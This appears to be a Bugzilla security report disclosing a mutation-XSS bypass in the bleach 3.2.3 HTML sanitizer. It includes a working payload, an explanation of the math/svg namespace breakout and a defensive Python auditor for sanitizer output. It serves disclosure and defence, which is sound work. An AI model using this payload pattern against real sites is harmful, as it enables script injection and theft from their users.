Bug 1689399 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
Copying a report from Yaniv Nizry (CC'd) to security@:

Hello,

My name is Yaniv Nizry and I'm a security analyst at Checkmarx's CxSCA group. Checkmarx is a global software security company aiming for the safer usage of code and libraries.

I recently found another mXSS vulnerability in Mozilla-bleach.

**Steps to reproduce:**

1. Have `strip_comments` set to `False` and allow the `math`/`svg`, `p`, and `style` tags.
2. Clean the following: `<math></p><style><!--</style><img src/onerror=alert(1)>`
3. Bleach output: `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>`

   ```python
   >>> import bleach
   >>> bleach.__version__
   '3.2.3'
   >>> bleach.clean('<math></p><style><!--</style><img src/onerror=alert(1)>', tags=['math', 'p', 'style'], strip_comments=False)
   '<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>'
   ```

4. After parsing it again in the browser:

   ```html
   <html>
   <head></head>
   <body>
   <math></math>
   <p></p>
   <style><!--</style>
   <img src(unknown) onerror="alert(1)">
   "-->
   "
   </body>
   </html>
   ```

**Expected results:**

Alert 1 will pop on the browser.

**Details:**

In HTML the `p` tag (and also `br`) are the only tags that will be created with just an end tag (e.g. `</p>` == `<p></p>`; on the other hand `</a>` == nothing).

Also, in the math/svg namespace there are tags that stop the namespace and break out of it, e.g. (using `img` as a breaker):

- `<svg><img></svg>` == `<svg><img></svg>`
- `<svg><style></svg>` == `<svg><style></style></svg>` == style is not a breaker
- `<svg><img><style></style></svg>` == `<svg></svg><img><style></style>` == the breaker ejects elements that come after.

The parsing issue here is that when passing `p` as an end tag it doesn't count as a namespace breaker; see how parsing twice will change the output:

```python
>>> bleach.clean("<math><p>", tags=["math", "p"])
'<math><p></p></math>'
>>> bleach.clean("<math><p></p></math>", tags=["math", "p"])
'<math></math><p></p>'
```

So going back to our PoC: at first the `style` tag is in the svg/math namespace, so the comment is like an html comment; then, when parsing again in the browser, the `p` tag breaks the `style` out of the svg/math namespace, changing it to an html namespace `style`. Now there is no comment and there is an `img` tag.

Bugzilla account - https://bugzilla.mozilla.org/user_profile?user_id=657031

Feel free to contact us for any questions.

Best regards,
Yaniv
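The report above turns on two facts: a sanitizer's output must survive a second parse unchanged (otherwise the browser builds a different tree than the sanitizer serialized), and inside `<math>`/`<svg>` certain HTML start tags end the foreign namespace. The following added example (written for this page, not code from the bug report or from bleach) gives defenders two checks built on those facts using only the standard library: `is_reparse_stable` tests any sanitizer callable for idempotence, and `ForeignContentAuditor` walks serialized HTML and flags constructs inside math/svg that a browser will re-parse differently: breakout start tags (the HTML spec's foreign-content breakout list is hard-coded below), comments, and a `<!--` left as raw text inside `<style>`. The sample inputs, the toy `replace`-based sanitizer and the function names are constructed for illustration.

```python
"""Defender-side checks for mXSS-prone sanitizer output (added example)."""
from html.parser import HTMLParser

# Per the HTML parsing algorithm, these start tags end foreign content
# (the math/svg namespaces) when encountered inside it. <font> only
# breaks out when it carries a color/face/size attribute (handled below).
FOREIGN_BREAKOUT_TAGS = frozenset("""
    b big blockquote body br center code dd div dl dt em embed
    h1 h2 h3 h4 h5 h6 head hr i img li listing menu meta nobr ol p
    pre ruby s small span strong strike sub sup table tt u ul var
""".split())
FOREIGN_ROOTS = frozenset({"math", "svg"})
VOID_TAGS = frozenset("area base br col embed hr img input link meta source track wbr".split())


def is_reparse_stable(sanitize, html):
    """True when sanitizing the sanitizer's own output changes nothing.

    Idempotence is the usual first defence against mXSS. Call this with the
    application's real sanitizer (e.g. a functools.partial of bleach.clean
    with the application's allow-list); bleach itself is not imported here.
    """
    once = sanitize(html)
    return sanitize(once) == once


class ForeignContentAuditor(HTMLParser):
    """Record constructs inside <math>/<svg> that make a browser's tree
    diverge from the tree the serializer thought it was emitting."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.stack = []      # names of currently open elements
        self.findings = []   # (kind, detail, depth)

    def in_foreign_content(self):
        return any(t in FOREIGN_ROOTS for t in self.stack)

    def handle_starttag(self, tag, attrs):
        if self.in_foreign_content():
            names = {name for name, _ in attrs}
            if tag in FOREIGN_BREAKOUT_TAGS or (
                    tag == "font" and names & {"color", "face", "size"}):
                self.findings.append(("breakout-tag", tag, len(self.stack)))
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.stack.pop()

    def handle_endtag(self, tag):
        # Pop back to the matching open element; stray end tags are ignored.
        if tag in self.stack:
            while self.stack.pop() != tag:
                pass

    def handle_comment(self, data):
        if self.in_foreign_content():
            self.findings.append(("comment", data, len(self.stack)))

    def handle_data(self, data):
        # html.parser treats <style> content as raw text, so "<!--" inside
        # it arrives here as data; in the other namespace it opens a comment.
        if (self.in_foreign_content() and self.stack
                and self.stack[-1] == "style" and "<!--" in data):
            self.findings.append(("comment-open-in-style", data, len(self.stack)))


def audit_sanitizer_output(html):
    """Return the auditor's findings for one piece of serialized HTML."""
    auditor = ForeignContentAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    # Bleach output quoted in the report, re-examined with the auditor.
    poc_output = '<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>'
    for finding in audit_sanitizer_output(poc_output):
        print(finding)
    # Constructed, deliberately non-idempotent toy sanitizer.
    strip_script = lambda s: s.replace("<script>", "")
    print(is_reparse_stable(strip_script, "<scr<script>ipt>alert(1)</script>"))
```

Run the auditor on what the sanitizer emits, not on the untrusted input: the report's point is that the output itself is what the browser reinterprets. A clean result from `audit_sanitizer_output` does not prove safety, but any `breakout-tag` finding means the serializer and the browser disagree about the tree, which is exactly the condition the PoC exploits.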